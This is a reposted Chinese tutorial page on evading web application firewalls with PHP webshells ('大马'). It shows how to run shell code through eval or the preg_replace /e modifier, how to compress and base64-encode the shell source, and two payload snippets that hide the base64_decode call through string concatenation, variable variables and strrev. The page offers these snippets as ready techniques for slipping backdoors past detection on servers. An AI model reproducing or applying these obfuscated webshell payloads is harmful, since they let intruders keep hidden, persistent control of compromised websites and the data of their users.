分享web开发知识

注册/登录|最近发布|今日推荐

主页 IT知识网页技术软件开发前端开发代码编程运营维护技术分享教程案例
当前位置:首页 > 软件开发

php大马免杀技巧 | bypass waf

发布时间:2023-09-06 02:06责任编辑:熊小新关键词:暂无标签

Part 1 前言

  

Part 2 免杀

  执行代码

eval 或 preg_replace的/e修饰符来执行大马代码。

   

$a = ‘phpinfo();‘;eval($a);//eval执行php代码

  编码

如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。

eval_gzinflate_base64类型加密与解密:

http://www.zhuisu.net/tool/phpencode.php

https://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php

自己写脚本加密:

$code= file_get_contents(‘D:\phpStudy\WWW\Test\Zlib\help.txt‘); //大马源码路径$encode = base64_encode(gzdeflate($code)); ?//加密函数自己修改就行echo $encode; //输出加密后代码

  解码

通过解码执行我们的代码。

  

  

<?php ????????????????????????//加密的代码eval(gzinflate(base64_decode(‘S03OyFdQ8shUKLbMTVOyBgA=‘)));?>

  关键字免杀

// 类型这样的关键字如果没有混淆拆分是过不了waf的eval(gzinflate(base64_decode// 我们需要做的就是关键字免杀

 

  免杀 payload

<?php$l=‘baSe6‘;$o=‘4_dE‘;$v=‘cO‘;$e=‘DE‘;$love=$l.$o.$v.$e;$c = "love";$a=$$c(‘源码base64加密‘);eval($a);?><?php$a = strrev(‘EdOcEd_46eSaB‘); $b= $a(‘源码base64加密‘);eval($b);?>

  

  

php大马免杀技巧 | bypass waf

原文地址:https://www.cnblogs.com/s0mf/p/9373471.html

知识推荐

我的编程学习网——分享web前端后端开发技术知识。 垃圾信息处理邮箱 tousu563@163.com 网站地图
icp备案号 闽ICP备2023006418号-8 不良信息举报平台 互联网安全管理备案 Copyright 2023 www.wodecom.cn All Rights Reserved